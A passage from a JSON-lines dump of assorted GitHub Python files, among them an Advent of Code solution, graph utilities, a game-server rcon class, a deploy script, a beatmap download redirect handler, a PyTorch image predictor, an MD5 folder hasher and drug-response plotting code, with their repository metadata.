2\nsum = 0\nwith open('day3-input.txt', 'r') as f:\n rucksacks = [r.strip() for r in f.readlines()]\n for i in range(0, len(rucksacks), 3):\n sacks = rucksacks[i:i+3]\n share = list(set(sacks[0]).intersection(sacks[1]).intersection(sacks[2]))\n #print(share)\n sum += value_string.index(share[0]) + 1 # index starts at 0\nprint(sum)","repo_name":"knastase/AoC2022","sub_path":"day3/day3.py","file_name":"day3.py","file_ext":"py","file_size_in_byte":816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"5287271416","text":"import networkx as nx\r\nimport matplotlib.pyplot as plt\r\n\r\nG=nx.read_adjlist(\"graphe1.txt\", create_using=nx.DiGraph())\r\n\r\ndef AffichageGraphe(graphe):\r\n pos = nx.planar_layout(graphe)\r\n\r\n nx.draw_networkx_nodes(graphe, pos)\r\n nx.draw_networkx_edges(graphe, pos)\r\n nx.draw_networkx_labels(graphe, pos)\r\n\r\n\r\n print(f\"Ce graphe contient {graphe.number_of_nodes()} sommets et {graphe.number_of_edges()} arêtes.\")\r\n plt.show()\r\n\r\ndef arcs_arrivant(graphe):\r\n liste_arrivant = []\r\n\r\n for s in graphe.edges:\r\n if s[1] == \"2\":\r\n liste_arrivant.append(s)\r\n return liste_arrivant\r\n\r\ndef arcs_arrivantV2(graphe):\r\n liste_arrivant = []\r\n\r\n for s in graphe.predecessors(\"2\"):\r\n arc = (s, \"2\")\r\n liste_arrivant.append(arc)\r\n return liste_arrivant\r\n\r\nprint(list(G.successors(\"2\")))\r\nprint(arcs_arrivantV2(G))\r\nAffichageGraphe(G)\r\n","repo_name":"AlexandroAR/SAE3.02","sub_path":"TP/lecture_adj.py","file_name":"lecture_adj.py","file_ext":"py","file_size_in_byte":883,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"5863517980","text":"from twisted.internet import defer\nfrom player import Player\n\nclass Server:\n\t\"\"\" this represents a bf3 server \"\"\"\n\n\tdef __init__(self, rcon):\n\t\tself.teams = {}\n\t\tself.players = {}\n\t\tself.rcon = rcon\n\t\n\tdef addPlayer(self, name, guid):\n\t\tlname = name.lower()\n\t\tif lname in self.players:\n\t\t\treturn self.players[lname]\n\t\tph = Player(name, guid)\n\t\tself.players[ph.lname] = ph\n\t\treturn ph\n\t\n\tdef delPlayer(self, name):\n\t\tlname = name.lower()\n\t\tif lname in self.players:\n\t\t\tph = self.players[lname]\n\t\t\tph.finalize()\n\t\t\tdel self.players[lname]\n\t\t\tdel ph\n\t\n\t@defer.inlineCallbacks\n\tdef getPlayer(self, name):\n\t\tlname = name.lower()\n\t\tif lname in self.players:\n\t\t\tdefer.returnValue(self.players[lname])\n\t\t\treturn\n\t\t### player not found, so let's create him\n\t\tpl = yield self.rcon.admin_listOnePlayer(name)\n\t\tph = self.addPlayer(pl['name'], pl['guid'])\n\t\tdefer.returnValue(ph)\n\t\treturn\n\t\n\n","repo_name":"ragzilla/txfbrcon","sub_path":"serverstate/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"48"} +{"seq_id":"26961951943","text":"# -*- coding: utf-8 -*-\nfrom conf import *\nfrom tool.utils import OSUtils\n\nos_utils = OSUtils()\n\n\ndef sync_common_data_files():\n if not os_utils.directory_exists(COMMON_DIR):\n raise ValueError(\"common directory not existed!\")\n if not os_utils.directory_exists(SERVER_DIR):\n raise ValueError(\"server directory not existed!\")\n if not os_utils.directory_exists(CLIENT_DATA_DIR):\n raise ValueError(\"client data directory not existed!\")\n for root_dir, _, file_names in os_utils.walk(COMMON_DIR):\n for filename in file_names:\n source = os_utils.joinpath(root_dir, filename)\n server_dist = os_utils.joinpath(SERVER_DIR, filename)\n client_dist = os_utils.joinpath(CLIENT_DATA_DIR, filename)\n os_utils.copy(source, server_dist)\n os_utils.copy(source, client_dist)\n print(\"copy file %s to server/client ok.\" % filename)\n\n\ndef package_client():\n if not os_utils.directory_exists(CLIENT_DIR):\n raise ValueError(\"client directory not existed!\")\n with os_utils.open_zip(UPDATE_FILE, \"w\",\n os_utils.ZIP_DEFLATED) as zipped:\n prefix_len = len(CLIENT_DIR) + 1\n for root, _, file_names in os_utils.walk(CLIENT_DIR):\n for filename in file_names:\n full_path = os_utils.joinpath(root, filename)\n zip_path = full_path[prefix_len:]\n zipped.write(full_path, zip_path)\n print(\"package client to data.7z\")\n\n\nif __name__ == '__main__':\n sync_common_data_files()\n package_client()\n","repo_name":"dwdw520533/mhzx","sub_path":"tool/deploy.py","file_name":"deploy.py","file_ext":"py","file_size_in_byte":1581,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"6511840186","text":"import os\n\nfrom django.conf import settings\nfrom django.core.cache import cache\nfrom django.core.management import call_command\nfrom django.core.management.base import BaseCommand\nfrom elections.constants import (\n PEOPLE_FOR_BALLOT_KEY_FMT,\n POLLING_STATIONS_KEY_FMT,\n POSTCODE_TO_BALLOT_KEY_FMT,\n)\n\n\nclass Command(BaseCommand):\n def add_arguments(self, parser):\n parser.add_argument(\n \"--full\",\n action=\"store_true\",\n dest=\"full\",\n default=False,\n help=\"Import all data, not just people\",\n )\n\n def handle(self, **options):\n if options[\"full\"]:\n commands = [\n (\"import_parties\",),\n (\"import_ballots\",),\n (\"import_people\",),\n ]\n else:\n commands = [(\"import_people\", \"--recently-updated\")]\n\n for command in commands:\n print(\" \".join(command))\n call_command(*command)\n\n # Delete the cache on a full import\n if options[\"full\"] and hasattr(cache, \"delete_pattern\"):\n for fmt in (\n POLLING_STATIONS_KEY_FMT,\n POSTCODE_TO_BALLOT_KEY_FMT,\n PEOPLE_FOR_BALLOT_KEY_FMT,\n ):\n cache.delete_pattern(fmt.format(\"*\"))\n\n # Unset dirty file if it exists\n if getattr(settings, \"CHECK_HOST_DIRTY\", False):\n dirty_file_path = os.path.expanduser(\n getattr(settings, \"DIRTY_FILE_PATH\")\n )\n\n if os.path.exists(dirty_file_path):\n os.remove(dirty_file_path)\n","repo_name":"DemocracyClub/WhoCanIVoteFor","sub_path":"wcivf/apps/core/management/commands/init_data.py","file_name":"init_data.py","file_ext":"py","file_size_in_byte":1611,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"48"} +{"seq_id":"1199504526","text":"import random\n\nimport requests\nimport json\n\nimport tornado.gen\nimport tornado.web\n\nfrom common.web import requestsManager\nfrom common.sentry import sentry\nfrom objects import glob\n\nMODULE_NAME = \"direct_download\"\nclass handler(requestsManager.asyncRequestHandler):\n\t\"\"\"\n\tHandler for /d/\n\t\"\"\"\n\t@tornado.web.asynchronous\n\t@tornado.gen.engine\n\t@sentry.captureTornado\n\tdef asyncGet(self, bid):\n\t\ttry:\n\t\t\tnoVideo = bid.endswith(\"n\")\n\t\t\tif noVideo:\n\t\t\t\tbid = bid[:-1]\n\t\t\tbid = int(bid)\n\t\t\trequestIP = requestsManager.getRequestIP(self)\n\t\t\tipa = requests.get(\"http://ip-api.com/json/{}?fields=continent,country\".format(requestIP)).text\n\t\t\tjsonOut = json.loads(ipa)\n\t\t\t\"\"\"\n\t\t\tif jsonOut[\"continent\"] == \"North America\" or jsonOut[\"continent\"] == \"South America\":\n\t\t\t\tmirror = \"https://aoba-proxy-us.herokuapp.com\"\n\t\t\t\ttry:\n\t\t\t\t\tc_mirror = \"https://aoba-proxy-us.herokuapp.com\"\n\t\t\t\t\trequests.get(c_mirror)\n\t\t\t\t\tprint(\"US SERVER OK\")\n\t\t\t\t\tresponse = requests.get(c_mirror+\"/d/1\")\n\t\t\t\t\tif response.status_code == 200:\n\t\t\t\t\t\tprint(\"US DOWNLOAD WORKS\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tprint(\"US SERVER IS DYING INSIDE, REDIRECTING TO MAIN SERVER\")\n\t\t\t\t\t\tmirror = \"https://storage.ainu.pw\"\n\t\t\t\texcept requests.exceptions.ConnectionError:\n\t\t\t\t\tprint(\"US SERVER DOWN, REDIRECTING TO MAIN SERVER\")\n\t\t\t\t\tmirror = \"https://storage.ainu.pw\"\n\t\t\telif jsonOut[\"continent\"] == \"Europe\" or jsonOut[\"continent\"] == \"Africa\":\n\t\t\t\teu_mirror = ['https://storage.ainu.pw', 'https://aoba-proxy-eu.herokuapp.com']\n\t\t\t\ttry:\n\t\t\t\t\tc_mirror = \"https://aoba-proxy-eu.herokuapp.com\"\n\t\t\t\t\trequests.get(c_mirror)\n\t\t\t\t\tprint(\"EU SERVER OK\")\n\t\t\t\t\tresponse = requests.get(c_mirror+\"/d/1\")\n\t\t\t\t\tif response.status_code == 200:\n\t\t\t\t\t\tprint(\"EU DOWNLOAD WORKS\")\n\t\t\t\t\t\teu_mirror = ['https://storage.ainu.pw', 'https://aoba-proxy-eu.herokuapp.com']\n\t\t\t\t\t\tmirror = random.choice(eu_mirror)\n\t\t\t\t\telse:\n\t\t\t\t\t\tprint(\"EU SERVER IS DYING INSIDE, REDIRECTING TO MAIN SERVER\")\n\t\t\t\t\t\tmirror = \"https://storage.ainu.pw\"\n\t\t\t\texcept requests.exceptions.ConnectionError:\n\t\t\t\t\tprint(\"EU SERVER DOWN, REDIRECTING TO MAIN SERVER\")\n\t\t\t\t\tmirror = \"https://storage.ainu.pw\"\n\t\t\telif jsonOut[\"continent\"] == \"Australia\":\n\t\t\t\tmirror = \"https://bm.realm.so\"\n\t\t\t\ttry:\n\t\t\t\t\tc_mirror = \"https://bm.realm.so\"\n\t\t\t\t\trequests.get(c_mirror)\n\t\t\t\t\tprint(\"AU SERVER OK\")\n\t\t\t\t\tresponse = requests.get(c_mirror+\"/d/1\")\n\t\t\t\t\tif response.status_code == 200:\n\t\t\t\t\t\tprint(\"AU DOWNLOAD WORKS\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tprint(\"AU SERVER IS DYING INSIDE, REDIRECTING TO MAIN SERVER\")\n\t\t\t\t\t\tmirror = \"https://storage.ainu.pw\"\n\t\t\t\texcept requests.exceptions.ConnectionError:\n\t\t\t\t\tprint(\"AU SERVER DOWN, REDIRECTING TO MAIN SERVER\")\n\t\t\t\t\tmirror = \"https://storage.ainu.pw\"\n\t\t\t# Server is too slow, so I disabled it.\n#\t\t\telif jsonOut[\"continent\"] == \"Asia\":\n#\t\t\t\tmirror = \"https://bm-th.ainu.pw\"\n#\t\t\t\ttry:\n#\t\t\t\t\tc_mirror = \"https://bm-th.ainu.pw\"\n#\t\t\t\t\trequests.get(c_mirror)\n#\t\t\t\t\tprint(\"TH/SEA SERVER OK\")\n#\t\t\t\t\tresponse = requests.get(c_mirror+\"/d/1\")\n#\t\t\t\t\tif response.status_code == 200:\n#\t\t\t\t\t\tprint(\"TH/SEA DOWNLOAD WORKS\")\n#\t\t\t\t\telse:\n#\t\t\t\t\t\tprint(\"TH/SEA SERVER IS DYING INSIDE, REDIRECTING TO MAIN SERVER\")\n#\t\t\t\t\t\tmirror = \"https://storage.ainu.pw\"\n#\t\t\t\texcept requests.exceptions.ConnectionError:\n#\t\t\t\t\tprint(\"TH/SEA SERVER DOWN, REDIRECTING TO MAIN SERVER\")\n#\t\t\t\t\tmirror = \"https://storage.ainu.pw\"\n\t\t\telse:\n\t\t\t\"\"\"\n\t\t\tmirror = \"https://storage.rina.place\"\n\n\t\t\tself.set_status(302, \"Moved Temporarily\")\n\t\t\tself.add_header(\"Location\", \"{}/d/{}{}\".format(mirror, bid, \"n\" if noVideo else \"\"))\n\t\t\tself.add_header(\"Cache-Control\", \"no-cache\")\n\t\t\tself.add_header(\"Pragma\", \"no-cache\")\n\t\texcept ValueError:\n\t\t\tself.set_status(400)\n\t\t\tself.write(\"Invalid set id\")","repo_name":"Unny984/eee","sub_path":"downloadMapHandler.py","file_name":"downloadMapHandler.py","file_ext":"py","file_size_in_byte":3649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"3066934663","text":"import os\nimport json\nimport torch\nfrom torch import nn\nfrom torch import optim\nfrom torchvision import datasets, transforms, models\nimport matplotlib.pyplot as plt\nfrom PIL import Image\nimport numpy as np\nimport argparse\nimport logging\nfrom collections import OrderedDict\nimport matplotlib.pyplot as plt\n\n\nclass Predict:\n def __init__(self, image_path):\n self.image_path = image_path\n \n\n def load_checkpoint(self, checkpoint):\n checkpoint = torch.load(checkpoint)\n self.model = models.vgg16(pretrained=True)\n for param in self.model.parameters(): \n param.requires_grad = False\n \n classifier = nn.Sequential(OrderedDict([\n ('fc1', nn.Linear (25088, 4096)),\n ('relu1', nn.ReLU ()),\n ('dropout1', nn.Dropout (0.05)),\n ('fc2', nn.Linear (4096, 2048)),\n ('relu2', nn.ReLU ()),\n ('dropout', nn.Dropout (0.05)),\n ('fc3', nn.Linear (2048, 102)),\n ('output', nn.LogSoftmax (dim =1))\n ]))\n \n self.model.classifier = classifier\n self.model.load_state_dict(checkpoint['state_dict'])\n self.model.class_to_idx = checkpoint['class_to_idx']\n \n def process_image(self):\n img = Image.open(self.image_path)\n\n original_width, original_height = img.size\n\n if original_width < original_height:\n size=[256, 256**600]\n else: \n size=[256**600, 256]\n \n img.thumbnail(size)\n center = original_width/4, original_height/4\n left, top, right, bottom = center[0]-(244/2), center[1]-(244/2), center[0]+(244/2), center[1]+(244/2)\n img = img.crop((left, top, right, bottom))\n\n numpy_img = np.array(img)/255 \n\n mean = [0.485, 0.456, 0.406]\n std = [0.229, 0.224, 0.225]\n numpy_img = (numpy_img-mean)/std\n\n numpy_img = numpy_img.transpose(2, 0, 1)\n \n return numpy_img\n \n def imshow(self, ax=None, title=None):\n if ax is None:\n fig, ax = plt.subplots()\n\n image = self.image_path.transpose((1, 2, 0))\n \n mean = np.array([0.485, 0.456, 0.406])\n std = np.array([0.229, 0.224, 0.225])\n image = std * image + mean\n image = np.clip(image, 0, 1)\n ax.imshow(image)\n \n return ax\n \n def predict(self, top_k, device, category_names=None):\n self.model.to(device)\n self.model.eval()\n torch_image = torch.from_numpy(np.expand_dims(self.process_image(), \n axis=0)).type(torch.FloatTensor).to(device)\n\n log_probs = self.model.forward(torch_image)\n linear_probs = torch.exp(log_probs)\n top_probs, top_labels = linear_probs.topk(top_k)\n \n top_probs = np.array(top_probs.detach())[0] \n top_labels = np.array(top_labels.detach())[0]\n \n idx_to_class = {val: key for key, val in self.model.class_to_idx.items()}\n top_labels = [idx_to_class[lab] for lab in top_labels]\n \n if category_names:\n with open(category_names, 'r') as f:\n cat_to_name = json.load(f)\n print(cat_to_name)\n class_name = [cat_to_name[i] for i in top_labels]\n \n \n return top_probs, top_labels, class_name\n \n \nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Predict based on the model')\n parser.add_argument('image_path', type=str, help='provide an image path')\n parser.add_argument('checkpoint', type=str, help='models checkpoint')\n parser.add_argument('--top_k', type=int, default=5, help=\"return top k most likely calsses\")\n parser.add_argument('--category_names', type=str, help='a mapping of categories to real names from a json file')\n parser.add_argument('--gpu', action='store_true', help = 'enable the GPU')\n\n args = parser.parse_args()\n image_path = args.image_path\n checkpoint = args.checkpoint\n top_k = args.top_k\n category_names = args.category_names\n \n cuda = False\n if args.gpu:\n if torch.cuda.is_available():\n cuda = True\n else:\n logging.warning(\"GPU is not exist, use CPU instead\") \n device = \"cuda\" if cuda else \"cpu\" \n \n predict = Predict(image_path)\n predict.load_checkpoint(checkpoint)\n numpy_img = predict.process_image()\n top_probs, top_labels, class_name = predict.predict(top_k, device, category_names)\n print(\"=\"*80)\n print(\" \"*35 + 'FLOWER PREDICTOR')\n print(\"=\"*80)\n print(\"Input label (or labels) = {}\".format(top_labels))\n print(\"Probability confidence(s) = {}\".format(top_probs))\n print(\"Class(es) name(s) = {}\".format(class_name))\n print(\"=\"*80)\n \n \n ","repo_name":"skyicechuchu/AI_Programming_with_python","sub_path":"project2/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":4940,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"18306906451","text":"import unittest\n\nfrom catlizor import Catlizor, Hook\n\n\nclass TaskManager:\n def __init__(self):\n self.tasks = {}\n\n def add_task(self, task: str, *items):\n self.tasks[task] = items\n\n def pop_task(self):\n return self.tasks.popitem()\n\n def get_tasks(self, task: str):\n return self.tasks[task]\n\n\n@Hook.pre\nclass PreHook(Hook):\n methods = [\"add_task\"]\n callbacks = []\n\n\n@Hook.on_call\nclass OnCallHook(Hook):\n methods = [\"get_tasks\"]\n callbacks = []\n\n\n@Hook.post\nclass PostHook(Hook):\n methods = [\"pop_task\"]\n callbacks = []\n\n\nclass TestCatlizor(unittest.TestCase):\n def test_catlizor(self):\n results = []\n\n def callback(result):\n nonlocal results\n if result.result is not None:\n results.append(result.result)\n else:\n results.append(result.args)\n\n PreHook.callbacks = [callback]\n OnCallHook.callbacks = [callback]\n PostHook.callbacks = [callback]\n\n PreHook.update_hookspec()\n OnCallHook.update_hookspec()\n PostHook.update_hookspec()\n\n tm_catlizor = Catlizor.hook(TaskManager, PreHook, OnCallHook, PostHook)\n tm = TaskManager()\n tm.add_task(\"a\", 1, 2)\n tm.get_tasks(\"a\")\n tm.pop_task()\n\n self.assertEqual(results, [(tm, \"a\", 1, 2), (1, 2), {}])\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"isidentical-archive/catlizor","sub_path":"tests/test_catlizor.py","file_name":"test_catlizor.py","file_ext":"py","file_size_in_byte":1408,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"48"} +{"seq_id":"551784658","text":"import pickle\nimport torch\n\n\nclass BaseActvMap:\n '''\n Base class for read activation map (if saved), calculate activation map (if not saved), \n and flatten the activation maps with different methods.\n Inherented by CulpritNeuronScore and Uncertainty class.\n Function:\n 1. load saved pkl data\n 2. flatten actv map\n '''\n \n def __init__(self):\n pass \n \n \n def load_pkl(self, path):\n '''\n load pkl files in the folder with the filename: gt, pred, activationMap, map_shape\n '''\n with open(path + 'activationMap.pkl', 'rb') as f:\n actv_map = pickle.load(f)\n with open(path + 'gt.pkl', 'rb') as f:\n gt = pickle.load(f)\n with open(path + 'pred.pkl', 'rb') as f:\n pred_prob = pickle.load(f)\n with open(path + 'map_shape.pkl', 'rb') as f:\n map_shape = pickle.load(f)\n # sanity check for data shape\n assert gt.shape[0] == pred_prob.shape[0], 'pred and gt do not have the same datapoints, pred {}, gt {}'.format(pred_prob.shape, gt.shape)\n for i in range(len(map_shape)):\n assert actv_map[i].size()[1:] == map_shape[i][1:], 'activation map {} and map shape are not at the same length, activateion map {}, map_shape {}.'.format(i, actv_map[i].size(), map_shape[i])\n print('*** actv shape (ignore dim 0 - batch size) is: {} .'.format(map_shape))\n print('*** {} data loaded ***'.format(path))\n return actv_map, gt.numpy(), pred_prob.numpy(), map_shape\n\n \n def flatten_actv_map(self, actv_map, mode):\n '''\n Input:\n - actv_map, a dict of {layer idx: activation map for that layer of shape (datapoints, activations) - FC layer, or (datapoints, 3D activation maps) - conv}\n Output: \n - feature, turnout, of shape (datapoints, neurons). numpy object\n Method:\n 1. flatten the 2D HxW activation map of one channel/unit/neuron to be a 1D scalar. \n mode: average, max, median\n 2. aggregate the neurons/channels at each layer to be single activation vector.\n \n '''\n # flatten activation map.\n mode_dict = {'mean': torch.mean, 'max': torch.max, 'median':torch.median, 'lognormal': 'lognormal'}\n activation = []\n turnouts = [] # appending variable for layerwise turnout\n # i corresponds to layer i in actv_map, of tensor d greater than 2. Disregards FC layers etc.\n for i in range(len(actv_map)):\n # conv layer case\n if len(actv_map[i].size()) > 2:\n actv_map_flattened = actv_map[i].reshape(actv_map[i].shape[0], actv_map[i].shape[1], -1)\n if mode == 'max':\n convert_map_to_scalar, _ = mode_dict[mode](actv_map_flattened, dim = 2)\n elif mode != 'lognormal':\n # take mean, median, etc across channel volume\n convert_map_to_scalar = mode_dict[mode](actv_map_flattened, dim = 2)\n activation.append(convert_map_to_scalar)\n elif mode == 'lognormal':\n # extract non-zero activations, log transform, take mean, transform back to initial domain.\n n_val = list(actv_map_flattened.size())[0]\n n_kern = list(actv_map_flattened.size())[1]\n weighted_median = torch.zeros(n_val, n_kern)\n t_out = torch.zeros(n_val, n_kern) #iterable turnout variable\n for img in range(n_val):\n for kern in range(n_kern):\n activations = actv_map_flattened[img][kern] # fetch 1-d length HxW channelwise activations\n nonzero_idx = torch.nonzero(activations)\n t_out[img][kern] = len(nonzero_idx)/len(activations)\n if nonzero_idx.size()[0] == 0: # If nonzero index is empty, then do not pass an empty arg to torch.log()\n weighted_median[img][kern] = 0\n else:\n log_mean = torch.mean(torch.log(activations[nonzero_idx]))\n weighted_median[img][kern] = torch.exp(log_mean) \n # Append output after each layer \n activation.append(weighted_median) # 2d image x channel vector of weighted median activations\n turnouts.append(t_out)\n else:\n # FC layer case\n activation.append(actv_map[i])\n turnouts.append(torch.ones_like(actv_map[i]))\n feature = torch.cat(activation, dim=1)\n turnout = torch.cat(turnouts, dim=1)\n if mode != 'lognormal': \n print('*** feature shape is {}.'.format(feature.shape))\n else:\n print('*** non-zero image specific actv shape: {} | turnout: {} |'.format(feature.shape, turnout.shape))\n # get the actv group for r/w preditions\n# self.right_actv = self.feature[self.label, :]\n# self.wrong_actv = self.feature[self.label==0, :]\n# self.right_actv_weighted_median = self.feature_weighted_median[self.label, :]\n# self.wrong_actv_weighted_median = self.feature_weighted_median[self.label==0, :]\n# print('*** right_actv shape is {}|{}, wrong_actv shape is {}|{}.'.format(self.right_actv.shape, self.right_actv_weigh ted_median.shape, self.wrong_actv.shape, self.wrong_actv_weighted_median.shape)) \n return feature.numpy(), turnout.numpy() # convert to numpy type before return\n \n \n \n\n \n","repo_name":"weinajin/pytorch_classification_template","sub_path":"activation_base_class.py","file_name":"activation_base_class.py","file_ext":"py","file_size_in_byte":5671,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"6419339087","text":"from hashlib import md5\nimport time\nimport os\n \ndef calMD5(str):\n m = md5()\n m.update(str)\n \n return m.hexdigest()\n \ndef calMD5ForFile(file):\n statinfo = os.stat(file)\n \n if int(statinfo.st_size)/(1024*1024) >= 1000 :\n return calMD5ForBigFile(file)\n m = md5()\n f = open(file, 'rb')\n m.update(f.read())\n f.close()\n \n return m.hexdigest()\n \ndef calMD5ForFolder(dir,MD5File):\n outfile = open(MD5File,'w',encoding=\"utf-8\")\n for root, subdirs, files in os.walk(dir):\n for file in files:\n filefullpath = os.path.join(root, file)\n \"\"\"print filefullpath\"\"\"\n \n filerelpath = os.path.relpath(filefullpath, dir)\n md5 = calMD5ForFile(filefullpath)\n outfile.write(dir+\"\\\\\"+filerelpath+':'+md5+\"\\n\")\n print(dir+\"\\\\\"+filerelpath+\" Completed!\")\n outfile.close()\n \ndef calMD5ForBigFile(file):\n m = md5()\n f = open(file, 'rb')\n buffer = 8192 # why is 8192 | 8192 is fast than 2048\n \n while 1:\n chunk = f.read(buffer)\n if not chunk : break\n m.update(chunk)\n \n f.close()\n return m.hexdigest()\n \n \n \n \nif __name__ == \"__main__\":\n #print calMD5(\"Hello World!\")\n \n t = time.time()\n #print(calMD5ForFile(\"H:\\\\[WMSUB][Detective_Conan][Movie_24_The Scarlet Bulle][BDRip][GB][1920X1080].mp4\"))\n calMD5ForFolder(\"E:\\\\World of Warcraft\",\"World_of_Warcraft.mdl\")","repo_name":"Shuai-Zuo/Trash_Codes_Archives","sub_path":"Exact time unknown/Python/FolderMd5/md5.py","file_name":"md5.py","file_ext":"py","file_size_in_byte":1453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"16293874539","text":"### Import libraries\n\n\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom seaborn import violinplot\nimport numpy as np\n\n\n### Functions useful for the drug comparison\n\n\ndef plot_comparison(score_rf, score_vae, score_vae_highcorr, label, title, save = False, out_path = \"figures/comparison_vae_rf.png\"):\n \"\"\"\n Plot a comparison of the random forest and vae across the three metrics.\n \"\"\"\n score = [score_rf, score_vae, score_vae_highcorr]\n xlim = [(-0.5, 0.7), (0, 9), (0.35, 0.75)]\n\n fig = plt.figure(constrained_layout = True, figsize = (15,15))\n fig.suptitle(title, fontsize = 15, fontweight = \"bold\")\n subfigs = fig.subfigures(nrows = 3, ncols = 1)\n\n for i in range(len(subfigs)):\n subfigs[i].suptitle(label[i], fontweight = \"bold\")\n axs = subfigs[i].subplots(nrows = 1, ncols = 3)\n \n for j, ax in enumerate(axs.flat):\n\n ax.grid(True)\n ax.set_title(score[i].columns[j])\n ax.set_xlim(xlim[j])\n ax.boxplot(score[i][score[i].columns[j]], vert = False)\n \n if save:\n plt.savefig(out_path, bbox_inches = 'tight', dpi = 300)\n\ndef plot_violin(score_RF_downsampling, score_RF_veryhigh_corr, score_RF_PCA, score_RF_embedding, score_RF, save = False, out_path = \"figures/embedding_comparisons.png\"):\n \"\"\"\n Plot a comparison of different RF models fitted with different input data, as violin plot.\n \"\"\"\n df1 = pd.DataFrame([score_RF_downsampling[\"Pearson's r\"].tolist(), 349*[\"Down-sampled\"]], \\\n index = [\"Pearson's r\", \"Input variables\"]).T\n df2 = pd.DataFrame([score_RF_veryhigh_corr[\"Pearson's r\"].tolist(),349*[\"Drug-correlated\"]],\\\n index = [\"Pearson's r\", \"Input variables\"]).T\n df3 = pd.DataFrame([score_RF_PCA[\"Pearson's r\"].tolist(), 349*[\"PCA\"]], \\\n index = [\"Pearson's r\", \"Input variables\"]).T\n df4 = pd.DataFrame([score_RF_embedding[\"Pearson's r\"].tolist(), 349*[\"VAE embedded\"]], \\\n index = [\"Pearson's r\", \"Input variables\"]).T\n df5 = pd.DataFrame([score_RF[\"Pearson's r\"].tolist(), 349*[\"All proteins\"]], \\\n index = [\"Pearson's r\", \"Input variables\"]).T\n df = pd.concat([df1, df2, df3, df4, df5])\n df[\"Pearson's r\"] = df[\"Pearson's r\"].astype(float)\n\n plt.figure(constrained_layout = True, figsize = (8,8))\n ax = violinplot(x = \"Input variables\", y = \"Pearson's r\", data = df)\n ax.axhline(df4[\"Pearson's r\"].median(), ls='-.', color = \"black\")\n ax.axhline(df4[\"Pearson's r\"].quantile(0.25), ls=':', color = \"purple\")\n ax.axhline(df4[\"Pearson's r\"].quantile(0.75), ls=':', color = \"purple\")\n\n plt.suptitle(\"Comparison of Random Forest models fitted with different input data\",\\\n fontsize = 15, fontweight = \"bold\")\n\n if save:\n plt.savefig(out_path, bbox_inches = 'tight', dpi = 300)\n\ndef get_drugs(score, bad_pred = True):\n \"\"\"\n Get a list of drugs that are either well-predicted (bad_pred = False) according to all metrics of the score \n (Pearson's r, RMSE, C-index), or badly-predicted (bad_pred = True).\n \"\"\"\n drug_list = []\n \n if bad_pred:\n for i, elem in enumerate(score.values):\n if elem[0] < score[\"Pearson's r\"].quantile(0.25) and elem[1] > score[\"RMSE\"].quantile(0.75) and elem[2] < score[\"C-index\"].quantile(0.25): # then the drug is badly predicted at all level\n drug_list.append(score.index[i])\n \n else:\n for i, elem in enumerate(score.values):\n if elem[0] > score[\"Pearson's r\"].quantile(0.75) and elem[1] < score[\"RMSE\"].quantile(0.25) and elem[2] > score[\"C-index\"].quantile(0.75): # then the drug is well predicted at all level\n drug_list.append(score.index[i])\n \n return(drug_list)\n\ndef plot_drug_distrib(drug, bad_drugs, negative_skew, save = False, out_path = \"figures/drugs_distrib.png\"):\n \"\"\"\n Plot the distributions of badly predicted drugs (bad_drugs) and well-predicted drugs with negative \n skew (negative_skew) to see whether there are noticable differences which could explain the prediction.\n \"\"\"\n fig = plt.figure(constrained_layout = True, figsize = (15,10))\n fig.suptitle(\"Distributions of AUC of outlier drugs\", fontsize = 15, fontweight = \"bold\")\n subfigs = fig.subfigures(nrows = 2, ncols = 1)\n\n subfigs[0].suptitle(\"Well-predicted drugs\", fontweight = \"bold\")\n axs = subfigs[0].subplots(nrows = 1, ncols = 3)\n for j, ax in enumerate(axs.flat):\n ax.grid(True)\n ax.set_title(negative_skew[j])\n ax.set_xlim((-0.5,20))\n ax.set_ylim((0,180))\n ax.hist(drug[negative_skew[j]])\n ax.set_xlabel(\"Drug sensitivity (AUC)\")\n\n subfigs[1].suptitle(\"Badly-predicted drugs\", fontweight = \"bold\")\n axs = subfigs[1].subplots(nrows = 1, ncols = 3)\n for j, ax in enumerate(axs.flat):\n ax.grid(True)\n ax.set_title(bad_drugs[j])\n ax.set_xlim((-0.5,20))\n ax.set_ylim((0,180))\n ax.hist(drug[bad_drugs[j]])\n ax.set_xlabel(\"Drug sensitivity (AUC)\")\n\n if save:\n plt.savefig(out_path, bbox_inches = 'tight', dpi = 300)\n\n\n### Functions useful for the deep-SHAP analysis\n\n\ndef convert_shap_to_gene(shap_values, gene_prot, proteins, shap_threshold = 0.9):\n \"\"\"\n Order proteins by SHAP value absolute mean importance, then convert the list of proteins to set of genes.\n \"\"\"\n # order proteins by shap value absolute mean importance\n df = pd.DataFrame({\n \"mean_abs_shap\": np.mean(np.abs(shap_values), axis=0), \n \"name\": proteins\n })\n df = df.sort_values(\"mean_abs_shap\", ascending=False)\n enriched_prot = df.loc[df.mean_abs_shap > df.mean_abs_shap.quantile(shap_threshold)].name\n\n # convert from protein to genes\n gene_set = gene_prot.loc[gene_prot[\"Uniprot\"].isin(enriched_prot)].Gene_Symbol\n gene_set = set(gene_set)\n\n 